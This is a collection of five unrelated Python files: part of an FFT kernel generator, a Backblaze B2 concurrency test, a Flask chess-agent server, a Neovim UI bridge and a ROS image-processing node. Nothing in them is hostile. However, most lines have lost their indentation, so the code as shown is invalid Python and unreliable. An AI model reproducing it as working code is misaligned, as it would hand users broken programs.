NS(length=[256,8], factors=[[4,4,4,4],[4,2]], threads_per_transform=[64,2], threads_per_block=512),
NS(length=[256,9], factors=[[4,4,4,4],[3,3]], threads_per_transform=[64,3], threads_per_block=768),
]
expanded = []
expanded.extend(NS(**kernel.__dict__,
scheme='CS_KERNEL_2D_SINGLE') for kernel in fused_kernels)
return expanded
def list_large_kernels():
"""Return list of large kernels to generate."""
sbcc_kernels = [
NS(length=50, factors=[10, 5], use_3steps_large_twd={
'sp': 'true', 'dp': 'true'}, threads_per_block=256),
NS(length=52, factors=[13, 4], use_3steps_large_twd={
'sp': 'true', 'dp': 'true'}),
NS(length=60, factors=[6, 10], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}),
NS(length=64, factors=[8, 8], use_3steps_large_twd={
'sp': 'true', 'dp': 'false'}),
NS(length=72, factors=[8, 3, 3], use_3steps_large_twd={
'sp': 'true', 'dp': 'false'}),
NS(length=80, factors=[10, 8], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}),
NS(length=81, factors=[3, 3, 3, 3], use_3steps_large_twd={
'sp': 'true', 'dp': 'true'}),
NS(length=84, factors=[7, 2, 6], use_3steps_large_twd={
'sp': 'true', 'dp': 'true'}),
NS(length=96, factors=[6, 16], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}),
NS(length=100, factors=[5, 5, 4], use_3steps_large_twd={
'sp': 'true', 'dp': 'false'}, threads_per_block=100),
NS(length=104, factors=[13, 8], use_3steps_large_twd={
'sp': 'true', 'dp': 'false'}),
NS(length=108, factors=[6, 6, 3], use_3steps_large_twd={
'sp': 'true', 'dp': 'false'}),
NS(length=112, factors=[4, 7, 4], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}),
NS(length=128, factors=[8, 4, 4], use_3steps_large_twd={
'sp': 'true', 'dp': 'true'}, threads_per_block=256),
NS(length=160, factors=[4, 10, 4], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}, flavour='wide'),
NS(length=168, factors=[7, 6, 4], use_3steps_large_twd={
'sp': 'true', 'dp': 'false'}, threads_per_block=128),
# NS(length=192, factors=[6, 4, 4, 2], use_3steps_large_twd={
# 'sp': 'false', 'dp': 'false'}),
NS(length=200, factors=[8, 5, 5], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}),
NS(length=208, factors=[13, 16], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}),
NS(length=216, factors=[8, 3, 3, 3], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}),
NS(length=224, factors=[8, 7, 4], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}),
NS(length=240, factors=[8, 5, 6], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'}),
NS(length=256, factors=[8, 4, 8], use_3steps_large_twd={
'sp': 'true', 'dp': 'false'}, flavour='wide'),
NS(length=336, factors=[6, 7, 8], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'})
]
    # For SBCC kernels, increase the desired threads_per_block so that the number
    # of columns per thread block also increases; currently targeting 16 columns.
block_width = 16
for k in sbcc_kernels:
k.scheme = 'CS_KERNEL_STOCKHAM_BLOCK_CC'
if not hasattr(k, 'threads_per_block'):
k.threads_per_block = block_width * \
functools.reduce(mul, k.factors, 1) // min(k.factors)
if not hasattr(k, 'length'):
k.length = functools.reduce(lambda a, b: a * b, k.factors)
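    # Worked example: the length-60 entry above (factors [6, 10]) has no explicit
    # threads_per_block, so it gets 16 * 60 // 6 = 160 threads per block.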
# SBRC
    # There is still room to improve some of these, e.g. length 200.
sbrc_kernels = [
NS(length=50, factors=[10, 5], scheme='CS_KERNEL_STOCKHAM_BLOCK_RC', threads_per_block=50, threads_per_transform=5, block_width=10),
# SBRC64: tpb=256 poor in MI50, FIXME: need to investigate why we can't set tpt=8? 61 128 256 fault
NS(length=64, factors=[4, 4, 4], scheme='CS_KERNEL_STOCKHAM_BLOCK_RC', threads_per_block=128, block_width=16),
NS(length=81, factors=[3, 3, 3, 3], scheme='CS_KERNEL_STOCKHAM_BLOCK_RC', threads_per_block=81, threads_per_transform=27, block_width=9),
NS(length=100, factors=[5, 5, 4], scheme='CS_KERNEL_STOCKHAM_BLOCK_RC', threads_per_block=100, threads_per_transform=25, block_width=4),
NS(length=128, factors=[8, 4, 4], scheme='CS_KERNEL_STOCKHAM_BLOCK_RC', threads_per_block=128, threads_per_transform=16, block_width=8),
# NS(length=128, factors=[8, 4, 4], scheme='CS_KERNEL_STOCKHAM_BLOCK_RC', threads_per_block=256, threads_per_transform=32, block_width=8), # correctness issue
NS(length=200, factors=[10, 10, 2], scheme='CS_KERNEL_STOCKHAM_BLOCK_RC', threads_per_block=100, threads_per_transform=10, block_width=10),
NS(length=256, factors=[4, 4, 4, 4], scheme='CS_KERNEL_STOCKHAM_BLOCK_RC', threads_per_block=256, threads_per_transform=64, block_width=8), # tpt should be 32?
]
# NB:
    # Technically, we could generate as many SBCR kernels as SBCC kernels.
#
# sbcr_kernels = copy.deepcopy(sbcc_kernels)
# for k in sbcr_kernels:
# k.scheme = 'CS_KERNEL_STOCKHAM_BLOCK_CR'
#
# Just enable length 100 and 200 for now.
sbcr_kernels = [
NS(length=100, factors=[10, 10], use_3steps_large_twd={
'sp': 'true', 'dp': 'false'}, threads_per_block=100),
NS(length=200, factors=[8, 5, 5], use_3steps_large_twd={
'sp': 'false', 'dp': 'false'})
]
block_width = 16
for k in sbcr_kernels:
k.scheme = 'CS_KERNEL_STOCKHAM_BLOCK_CR'
if not hasattr(k, 'threads_per_block'):
k.threads_per_block = block_width * \
functools.reduce(mul, k.factors, 1) // min(k.factors)
if not hasattr(k, 'length'):
k.length = functools.reduce(lambda a, b: a * b, k.factors)
return sbcc_kernels + sbcr_kernels + sbrc_kernels
def default_runtime_compile(kernels):
'''Returns a copy of input kernel list with a default value for runtime_compile.'''
return [k if hasattr(k, 'runtime_compile') else NS(**k.__dict__, runtime_compile=False) for k in kernels]
def generate_kernel(kernel, precisions, stockham_aot):
"""Generate a single kernel file for 'kernel'.
The kernel file contains all kernel variations corresponding to
the kernel meta data in 'kernel'.
A list of CPU functions is returned.
"""
args = [stockham_aot]
# 2D single kernels always specify threads per transform
if isinstance(kernel.length, list):
args.append(','.join([str(f) for f in kernel.factors[0]]))
args.append(','.join([str(f) for f in kernel.factors[1]]))
args.append(','.join([str(f) for f in kernel.threads_per_transform]))
else:
args.append(','.join([str(f) for f in kernel.factors]))
# 1D kernels might not, and need to default to 'uwide'
threads_per_transform = getattr(kernel,'threads_per_transform', {
'uwide': kernel.length // min(kernel.factors),
'wide': kernel.length // max(kernel.factors),
'tall': 0,
'consolidated': 0
}[getattr(kernel,'flavour', 'uwide')])
args.append(str(threads_per_transform))
# default half_lds to True only for CS_KERNEL_STOCKHAM
half_lds = getattr(kernel, 'half_lds', kernel.scheme == 'CS_KERNEL_STOCKHAM')
filename = kernel_file_name(kernel)
args.append(str(kernel.threads_per_block))
args.append(str(getattr(kernel, 'block_width', 0)))
args.append('1' if half_lds else '0')
args.append(kernel.scheme)
args.append(filename)
proc = subprocess.run(args=args, stdout=subprocess.PIPE, check=True)
clang_format_file(filename)
import json
launchers = json.loads(proc.stdout.decode('ascii'))
cpu_functions = []
data = Variable('data_p', 'const void *')
back = Variable('back_p', 'void *')
for launcher_dict in launchers:
launcher = NS(**launcher_dict)
factors = launcher.factors
length = launcher.lengths[0] if len(launcher.lengths) == 1 else (launcher.lengths[0], launcher.lengths[1])
transforms_per_block = launcher.transforms_per_block
threads_per_block = launcher.threads_per_block
threads_per_transform = threads_per_block // transforms_per_block
half_lds = launcher.half_lds
scheme = launcher.scheme
sbrc_type = launcher.sbrc_type
sbrc_transpose_type = launcher.sbrc_transpose_type
precision = 'dp' if launcher.double_precision else 'sp'
runtime_compile = kernel.runtime_compile
use_3steps_large_twd = getattr(kernel, 'use_3steps_large_twd', None)
block_width = getattr(kernel, 'block_width', 0)
params = LaunchParams(transforms_per_block, threads_per_block, threads_per_transform, half_lds)
# make 2D list of threads_per_transform to populate FFTKernel
tpt_list = kernel.threads_per_transform if scheme == 'CS_KERNEL_2D_SINGLE' else [threads_per_transform, 0]
f = Function(name=launcher.name,
arguments=ArgumentList(data, back),
meta=NS(
factors=factors,
length=length,
params=params,
precision=precision,
runtime_compile=runtime_compile,
scheme=scheme,
threads_per_block=threads_per_block,
transforms_per_block=transforms_per_block,
threads_per_transform=tpt_list,
transpose=sbrc_transpose_type,
use_3steps_large_twd=use_3steps_large_twd,
block_width=block_width,
))
cpu_functions.append(f)
return cpu_functions
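# Note: the AOT generator invoked above is expected to print a JSON list of
# launcher descriptions on stdout; the fields consumed here are name, factors,
# lengths, transforms_per_block, threads_per_block, half_lds, scheme, sbrc_type,
# sbrc_transpose_type and double_precision.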
def generate_kernels(kernels, precisions, stockham_aot):
"""Generate and write kernels from the kernel list.
Entries in the kernel list are simple namespaces. These are
passed as keyword arguments to the Stockham generator.
A list of CPU functions is returned.
"""
import threading
import queue
# push all the work to a queue
q_in = queue.Queue()
for k in kernels:
q_in.put(k)
# queue for outputs
q_out = queue.Queue()
def threadfunc():
nonlocal q_in
nonlocal q_out
nonlocal precisions
nonlocal stockham_aot
try:
while not q_in.empty():
k = q_in.get()
q_out.put(generate_kernel(k, precisions, stockham_aot))
except queue.Empty:
pass
# by default, start up worker threads. disable this if you want
# to use pdb to debug
use_threads = True
if use_threads:
threads = []
for i in range(os.cpu_count()):
threads.append(threading.Thread(target=threadfunc))
for t in threads:
t.start()
for t in threads:
t.join()
else:
threadfunc()
# iterate over the queue
def queue_iter(q_out):
try:
while not q_out.empty():
yield q_out.get()
except queue.Empty:
pass
return flatten(queue_iter(q_out))
def cli():
"""Command line interface..."""
parser = argparse.ArgumentParser(prog='kernel-generator')
subparsers = parser.add_subparsers(dest='command')
parser.add_argument('--pattern', type=str, help='Kernel pattern to generate.', default='all')
parser.add_argument('--precision', type=str, help='Precision to generate.', default='all')
parser.add_argument('--manual-small', type=str, help='Small kernel sizes to generate.')
parser.add_argument('--manual-large', type=str, help='Large kernel sizes to generate.')
parser.add_argument('--runtime-compile', type=str, help='Allow runtime-compiled kernels.')
list_parser = subparsers.add_parser('list', help='List kernel files that will be generated.')
generate_parser = subparsers.add_parser('generate', help='Generate kernels.')
generate_parser.add_argument('stockham_aot', type=str, help='Stockham AOT executable.')
args = parser.parse_args()
patterns = args.pattern.split(',')
precisions = args.precision.split(',')
if 'all' in precisions:
precisions = ['sp', 'dp']
precisions = [{'single': 'sp', 'double': 'dp'}.get(p, p) for p in precisions]
#
# kernel list
#
kernels = []
    # Keep the 2D kernels separate from 'all' so that non-2D patterns do not iterate over them.
kernels_2d = list_2d_kernels()
all_kernels = list_small_kernels() + list_large_kernels()
manual_small, manual_large = [], []
if args.manual_small:
manual_small = list(map(int, args.manual_small.split(',')))
if args.manual_large:
manual_large = list(map(int, args.manual_large.split(',')))
if 'all' in patterns and not manual_small and not manual_large:
kernels += all_kernels + kernels_2d
if 'pow2' in patterns:
lengths = [2**x for x in range(13)]
kernels += [k for k in all_kernels if k.length in lengths]
if 'pow3' in patterns:
lengths = [3**x for x in range(8)]
kernels += [k for k in all_kernels if k.length in lengths]
if 'pow5' in patterns:
lengths = [5**x for x in range(6)]
kernels += [k for k in all_kernels if k.length in lengths]
if 'pow7' in patterns:
lengths = [7**x for x in range(5)]
kernels += [k for k in all_kernels if k.length in lengths]
if 'small' in patterns:
schemes = ['CS_KERNEL_STOCKHAM']
kernels += [k for k in all_kernels if k.scheme in schemes]
if 'large' in patterns:
schemes = ['CS_KERNEL_STOCKHAM_BLOCK_CC', 'CS_KERNEL_STOCKHAM_BLOCK_RC', 'CS_KERNEL_STOCKHAM_BLOCK_CR']
kernels += [k for k in all_kernels if k.scheme in schemes]
if '2D' in patterns:
kernels += kernels_2d
if manual_small:
schemes = ['CS_KERNEL_STOCKHAM']
kernels += [k for k in all_kernels if k.length in manual_small and k.scheme in schemes]
if manual_large:
schemes = ['CS_KERNEL_STOCKHAM_BLOCK_CC', 'CS_KERNEL_STOCKHAM_BLOCK_RC', 'CS_KERNEL_STOCKHAM_BLOCK_CR']
kernels += [k for k in all_kernels if k.length in manual_large and k.scheme in schemes]
kernels = unique(kernels)
#
# set runtime compile
#
kernels = default_runtime_compile(kernels)
if args.runtime_compile != 'ON':
for k in kernels:
k.runtime_compile = False
#
# sub commands
#
if args.command == 'list':
scprint(set(['function_pool.cpp'] + list_generated_kernels(kernels)))
if args.command == 'generate':
cpu_functions = generate_kernels(kernels, precisions, args.stockham_aot)
write('function_pool.cpp', generate_cpu_function_pool(cpu_functions), format=True)
if __name__ == '__main__':
cli()
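# Example invocations (sketch; the script path and the stockham_aot path are
# illustrative, not taken from the build system):
#   python kernel-generator.py --pattern pow2,pow5 --precision single list
#   python kernel-generator.py --pattern all --runtime-compile ON generate /path/to/stockham_aot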
|
test_upload_url_concurrency.py
|
######################################################################
#
# File: b2/account_info/test_upload_conncurrency.py
#
# Copyright 2018 Backblaze Inc. All Rights Reserved.
#
# License https://www.backblaze.com/using_b2_code.html
#
######################################################################
import os
import threading
import six
from .sqlite_account_info import SqliteAccountInfo
def test_upload_url_concurrency():
# Clean up from previous tests
file_name = '/tmp/test_upload_conncurrency.db'
try:
os.unlink(file_name)
except OSError:
pass
# Make an account info with a bunch of upload URLs in it.
account_info = SqliteAccountInfo(file_name)
available_urls = set()
for i in six.moves.range(3000):
url = 'url_%d' % i
account_info.put_bucket_upload_url('bucket-id', url, 'auth-token-%d' % i)
available_urls.add(url)
# Pull them all from the account info, from multiple threads
lock = threading.Lock()
def run_thread():
while True:
(url, _) = account_info.take_bucket_upload_url('bucket-id')
if url is None:
break
with lock:
if url in available_urls:
available_urls.remove(url)
else:
print('DOUBLE:', url)
threads = []
for i in six.moves.range(5):
thread = threading.Thread(target=run_thread)
thread.start()
threads.append(thread)
for t in threads:
t.join()
# Check
if len(available_urls) != 0:
print('LEAK:', available_urls)
# Clean up
os.unlink(file_name)
|
pit-server.py
|
import Arena
from MCTS import MCTS
from chess.ChessGame import ChessGame, display
from chess.ChessPlayers import *
from chess.keras.NNet import NNetWrapper as NNet
import numpy as np
from utils import *
from flask import Flask, request, send_from_directory, send_file
from threading import Thread
import json, random, string
"""
use this script to play any two agents against each other, or play manually with
any agent.
"""
ncp_new = "saves/" # Checkpoint path
ncf_new = "checkpoint_2.pth.tar" # Checkpoint file
nca_new = { 'numMCTSSims': 500, 'cpuct': 1.0, 'temp': 0 } # NNet args
#ncp_new = "saves/" # Checkpoint path
#ncf_new = "checkpoint_2.pth.tar" # Checkpoint file
#nca_new = { 'numMCTSSims': 1000, 'cpuct': 1.0, 'temp': 0 } # NNet args
ncp_old = "saves/save-bc5a3cffa65" # Checkpoint path
ncf_old = "best.pth.tar" # Checkpoint file
nca_old = { 'numMCTSSims': 25, 'cpuct': 1.0, 'temp': 0 } # NNet args
class GameWrapper():
def __init__(self, sess_id, p1, p2, gm):
self.g = ChessGame()
        self.result_queue = Queue()  # Queue is assumed to be provided by one of the wildcard imports above
self.sess_id = sess_id
self.gm = gm
if p1 == "human":
self.player1 = HumanNetworkChessPlayer(self.g, self.result_queue)
elif p1 == "nnet-new":
self.player1 = NNetNetworkPlayer(self.g, ncp_new, ncf_new, nca_new)
elif p1 == "nnet-old":
self.player1 = NNetNetworkPlayer(self.g, ncp_old, ncf_old, nca_old)
elif p1 == "alpha-beta":
self.player1 = AlphaBetaNetworkPlayer(self.g)
else:
self.player1 = RandomNetworkPlayer(self.g)
if p2 == "human":
self.player2 = HumanNetworkChessPlayer(self.g, self.result_queue)
elif p2 == "nnet-new":
self.player2 = NNetNetworkPlayer(self.g, ncp_new, ncf_new, nca_new)
elif p2 == "nnet-old":
self.player2 = NNetNetworkPlayer(self.g, ncp_old, ncf_old, nca_old)
elif p2 == "alpha-beta":
self.player2 = AlphaBetaNetworkPlayer(self.g)
else:
self.player2 = RandomNetworkPlayer(self.g)
self.p1p = self.player1.play
self.p2p = self.player2.play
def arena_hook(self, result_queue):
arena = Arena.Arena(self.p1p, self.p2p, self.g, display=display, result_queue=result_queue)
arena.playGames(2, verbose=True)
# Dictionary of all the games, key is sess_id, value is GameWrapper class
games = dict()
# Web server code for GUI
app = Flask(__name__, static_url_path='/chess')
@app.route("/new_game", methods=["GET"])
def new_game():
"""
    The client is requesting a new game: send back a session id and create a
    new game instance.
"""
# Generate a random session id
sess_id = "".join(random.choice(string.ascii_letters + string.digits) for _ in range(16))
player1 = request.args.get("player1")
player2 = request.args.get("player2")
game_mode = request.args.get("game_mode")
# Initialize a new game
new_game = GameWrapper(sess_id, player1, player2, game_mode)
arena = Thread(target=new_game.arena_hook, args=(new_game.result_queue,))
arena.daemon = True
arena.start()
# Add game to dictionary
games[sess_id] = new_game
return sess_id
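# Example (sketch; host/port assume the default Flask dev server, and the
# game_mode value is simply stored on the wrapper):
#   GET http://localhost:5000/new_game?player1=human&player2=nnet-new&game_mode=pvp
# The response body is the 16-character session id used by /get_move and /make_move.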
@app.route("/get_move", methods=["GET"])
def get_move():
sess_id = request.args.get("sess_id")
turn_color = request.args.get("turn")
if turn_color == "w":
move = games[sess_id].player1.queue.get()
else:
move = games[sess_id].player2.queue.get()
move["result"] = games[sess_id].result_queue.get()
return json.dumps(move)
@app.route("/make_move", methods=["POST"])
def make_move():
sess_id = request.form.get("sess_id")
turn_color = request.form.get("turn")
move = request.form.get("move")
if turn_color == "w":
games[sess_id].player1.queue.put(move)
else:
games[sess_id].player2.queue.put(move)
res = games[sess_id].result_queue.get()
return json.dumps({ "result": res })
@app.route("/<path:path>", methods=["GET"])
def serve_static(path):
return send_from_directory('chess', path)
def web_server_hook():
app.run(host='0.0.0.0')
args = dotdict({
'nnet_workers': 2
})
def main():
# Start webserver
web_server = Thread(target=web_server_hook)
web_server.daemon = True
web_server.start()
web_server.join()
if __name__ == "__main__":
main()
|
ui_bridge.py
|
"""Bridge for connecting a UI instance to nvim."""
import sys
from threading import Semaphore, Thread
from traceback import format_exc
class UIBridge(object):
"""UIBridge class. Connects a Nvim instance to a UI class."""
def connect(self, nvim, ui, profile=None, notify=False):
"""Connect nvim and the ui.
This will start loops for handling the UI and nvim events while
also synchronizing both.
"""
self._notify = notify
self._error = None
self._nvim = nvim
self._ui = ui
self._profile = profile
self._sem = Semaphore(0)
t = Thread(target=self._nvim_event_loop)
t.daemon = True
t.start()
self._ui_event_loop()
if self._error:
print(self._error)
if self._profile:
print(self._profile)
def exit(self):
"""Disconnect by exiting nvim."""
self.detach()
self._call(self._nvim.quit)
def input(self, input_str):
"""Send input to nvim."""
self._call(self._nvim.input, input_str)
def resize(self, columns, rows):
"""Send a resize request to nvim."""
self._call(self._nvim.ui_try_resize, columns, rows)
def attach(self, columns, rows, rgb):
"""Attach the UI to nvim."""
self._call(self._nvim.ui_attach, columns, rows, rgb)
def detach(self):
"""Detach the UI from nvim."""
self._call(self._nvim.ui_detach)
def _call(self, fn, *args):
self._nvim.async_call(fn, *args)
def _ui_event_loop(self):
self._sem.acquire()
# if self._profile:
# import StringIO
# import cProfile
# import pstats
# pr = cProfile.Profile()
# pr.enable()
# self._ui.start(self)
# if self._profile:
# pr.disable()
# s = StringIO.StringIO()
# ps = pstats.Stats(pr, stream=s)
# ps.strip_dirs().sort_stats(self._profile).print_stats(30)
# self._profile = s.getvalue()
def _nvim_event_loop(self):
def on_setup():
self._sem.release()
def on_request(method, args):
raise Exception('Not implemented')
def on_notification(method, updates):
def apply_updates():
if self._notify:
sys.stdout.write('attached\n')
sys.stdout.flush()
self._notify = False
try:
for update in updates:
# import sys
# l = [','.join([str(a) for a in args])
# for args in update[1:]]
# print >> sys.stderr, update[0], ' '.join(l)
try:
nvim_handler = getattr(self._ui, 'nvim_handler')
handler = getattr(nvim_handler, '_nvim_' + update[0])
except AttributeError as err:
pass
else:
for args in update[1:]:
handler(*args)
except Exception as err :
                    print('ERROR OCCURRED, unfortunately no traceback..')
import pdb;pdb.set_trace()
self._error = format_exc()
self._call(self._nvim.quit)
if method == 'redraw':
self._ui.schedule_screen_update(apply_updates)
self._nvim.run_loop(on_request, on_notification, on_setup)
self._ui.quit()
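# Minimal usage sketch (assumptions: pynvim is installed, and `ui` is an object
# implementing schedule_screen_update() and quit() and exposing an `nvim_handler`
# attribute with _nvim_* methods, as referenced above):
#
#   from pynvim import attach
#   nvim = attach('child', argv=['nvim', '--embed'])
#   UIBridge().connect(nvim, ui)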
|
imgprocx.py
|
#!/usr/bin/python
from __future__ import division
import cv2
from cv2 import cv
from copy import copy
import numpy as np
import multiprocessing.dummy as mp
from multiprocessing import Lock
import sys
import math
import rospy
import roslib
import cv_bridge
from sensor_msgs.msg import Image
from numpy import dtype
class ImageProcessor():
# Processing Mode
# mode = 0 : Do nothing
# mode = 1 : Automatic gamma adjustment
    # mode = 2 : Conversion to an illumination-invariant color space
def __init__ (self, processMode=0, subscribedImageTopic='', publishedImageTopic='', maskPath=None, **kwargs):
self.imageSub = rospy.Subscriber(subscribedImageTopic, Image, self.imageCallback, queue_size=100)
self.publisher = rospy.Publisher(publishedImageTopic, Image, queue_size=100)
self.bridge = cv_bridge.CvBridge()
self.mask = cv2.imread (maskPath, cv2.cv.CV_LOAD_IMAGE_GRAYSCALE)
self.cImage = None
self.resultImage = None
self.cImageHsv = None
self.isMono = None
self.imageMutex = Lock ()
self.mode = processMode
try:
self.doSmearDetection = bool(kwargs['smearDetection'])
self.iiAlpha = kwargs['IlluminatiAlpha']
except KeyError:
self.doSmearDetection = False
self.iiAlpha = 0.394
# cv2.namedWindow('xyz')
def imageCallback (self, imageMsg):
# print ("Callback called")
# self.imageMutex.acquire()
self.cImage = self.bridge.imgmsg_to_cv2(imageMsg, 'bgr8')
self.isMono = False
# self.imageMutex.release()
self.process()
if self.isMono:
msg = self.bridge.cv2_to_imgmsg(self.resultImage, 'mono8')
else:
msg = self.bridge.cv2_to_imgmsg(self.resultImage, 'bgr8')
msg.header.stamp = rospy.Time.now()
self.publisher.publish(msg)
def process (self):
if self.cImage is None :
return
# self.imageMutex.acquire ()
# Preparation
imghsv = cv2.cvtColor(self.cImage, cv.CV_BGR2HSV)
self.cImageHsv = cv2.split(imghsv)
if self.doSmearDetection:
smearQual = self.detectSmear(self.cImageHsv[2])
print ("Smear: {}".format(smearQual))
if self.mode == 0:
self.resultImage = self.cImage
self.isMono = False
elif self.mode == 1 :
self.resultImage = ImageProcessor.autoAdjustGammaRGB(self.cImage, self.mask)
self.isMono = False
elif self.mode == 2 :
self.resultImage = ImageProcessor.toIlluminatiInvariant(self.cImage, self.iiAlpha)
self.isMono = True
# self.imageMutex.release ()
@staticmethod
def autoAdjustGammaRGB (rgbImage, mask=None, gammaOnly=False):
monoimg = cv2.cvtColor(rgbImage, cv.CV_BGR2GRAY)
g = ImageProcessor.autoAdjustGammaMono(monoimg, mask, gammaOnly=True)
if gammaOnly:
return g
img_b = ImageProcessor.setGamma(rgbImage[:,:,0], g)
img_g = ImageProcessor.setGamma(rgbImage[:,:,1], g)
img_r = ImageProcessor.setGamma(rgbImage[:,:,2], g)
return cv2.merge([img_b, img_g, img_r])
@staticmethod
def autoAdjustGammaMono (grayImage, mask=None, gammaOnly=False):
roicdf = ImageProcessor.cdf(grayImage, mask)
# Try to find midtone; it is X when cdf[X] = 0.5
midtone = 0
for i in range(len(roicdf)):
if roicdf[i]>=0.5:
midtone = i
break
target = 0.5
midtone /= 255.0
gamma = math.log(target) / math.log(midtone)
if (gammaOnly):
return gamma
if (midtone >= 0.5):
return grayImage
return ImageProcessor.setGamma (grayImage, gamma)
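    # Worked example for autoAdjustGammaMono: if the cumulative histogram first
    # reaches 0.5 at pixel value 96, then midtone = 96/255 ~ 0.376 and
    # gamma = log(0.5)/log(0.376) ~ 0.71, so applying setGamma lifts the midtone to ~0.5.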
@staticmethod
def toIlluminatiInvariant (imageRgb, alpha):
imgf = np.array(imageRgb, dtype=np.float32) / 255.0
imgf = 0.5 + np.log(imgf[:,:,1]) - alpha*np.log(imgf[:,:,0]) - (1-alpha)*np.log(imgf[:,:,2])
return np.array(imgf*255.0, dtype=np.uint8)
# return cv2.cvtColor(img, cv.CV_GRAY2BGR)
def beautify (self):
midall = self.allcdf[127]
midroi = self.roicdf[127]
def needBeautify ():
if (midall >= 0.4 and midall <= 0.6):
return False
if (midall > 0.6 and midroi < midall):
return False
if (midall > 0.6 and midroi-midall>=0.16):
return True
# if abs(midall-midroi) <
if (needBeautify()):
self.cImageHsv[2] = ImageProcessor.equalizeByMask(self.cImageHsv[2], self.mask)
self.noProcess = False
else:
return
@staticmethod
def getNormalizedVerticalSum (chan):
channorm = chan / 256.0
tv = np.zeros(channorm.shape[1], dtype=np.float32)
for i in range(channorm.shape[1]):
tv[i] = np.sum(channorm[:,i])
tv /= float(channorm.shape[0])
return tv
@staticmethod
def detectSmear (VchanSrc, tolerance=0.1):
threshold1 = 0.15 * VchanSrc.shape[1]
# Normalize V channel
tv = ImageProcessor.getNormalizedVerticalSum(VchanSrc)
nc = 0
for i in range(VchanSrc.shape[1]) :
if tv[i] >= 1.0-tolerance:
nc += 1
if nc==0:
return -1
else:
print ("Cols: {}".format(nc))
if nc >= threshold1:
return 1
else:
return float(nc) / float(threshold1)
@staticmethod
def setGamma (source, gamma):
LUT = np.array(
[ ((i/255.0)**gamma)*255.0 for i in range(256)]
, dtype=np.uint8)
return cv2.LUT(source, LUT)
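    # Example: with gamma = 0.5 the lookup table maps 64 -> ((64/255)**0.5)*255 ~ 127,
    # i.e. dark pixels are lifted towards the middle of the range.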
@staticmethod
def equalizeByMask (source, mask=None):
LUT = np.zeros((256,1), dtype=np.uint8)
output = np.zeros(source.shape, dtype=source.dtype)
hist = cv2.calcHist ([source], [0], mask, [256], [0,256])
p = 0
while (hist[p]==0):
p += 1
total = source.shape[0]*source.shape[1]
miz = hist[p]
scale = 256.0 / (total-miz)
sum = 0
for i in range (p, 256):
sum += int (hist[i])
l = sum * scale
if l > 255:
LUT[i] = 255
else:
LUT[i] = l
cv2.LUT(source, LUT, output)
return output
# for (LUT.at<uchar>(i++)=0; i<256; ++i) {
# sum += (int)hist.at<float>(i);
# LUT.at<uchar>(i) = cv::saturate_cast<uchar>(sum * scale);
# }
# def needEqualize (self):
# pass
@staticmethod
def cdf (grayImage, mask=None, normalized=True):
hist = cv2.calcHist ([grayImage], [0], mask, [256], [0,256])
rcdf = np.cumsum(hist)
if normalized:
return rcdf / sum(hist)
else:
return rcdf
# class Downsampler:
# def __init__ (self, imgproc, publishedTopic, rate=10.0):
# self.rate = rospy.Rate(rate)
# self.imgproc = imgproc
# self.publisher = rospy.Publisher(publishedTopic, Image, queue_size=10)
# self.bridge = cv_bridge.CvBridge()
#
# self.stop = False
# self.process = mp.Process(target=self.start)
# self.process.start()
#
# def start (self):
# while self.stop==False:
#
# currentImage = None
# self.imgproc.process()
# currentImage = self.imgproc.resultImage
#
# if currentImage is not None:
# if self.imgproc.isMono:
# msg = self.bridge.cv2_to_imgmsg(currentImage, 'mono8')
# else:
# msg = self.bridge.cv2_to_imgmsg(currentImage, 'bgr8')
# msg.header.stamp = rospy.Time.now()
# self.publisher.publish(msg)
# self.rate.sleep()
if __name__ == '__main__' :
maskpath = sys.argv[1]
mode = 0
try:
mode = int (sys.argv[2])
except IndexError:
pass
if mode == 0:
print ("Images will be untouched")
else:
print ("Images will be modified")
rospy.init_node("imgprocx", anonymous=True)
imgproc = ImageProcessor (mode, "/camera/image_raw", "/camera/image_hs", maskpath, smearDetection=False, IlluminatiAlpha=0.3975)
# downsample = Downsampler (imgproc, "/camera/image_hs", rate=10.0)
rospy.spin()
# downsample.stop = True
pass
|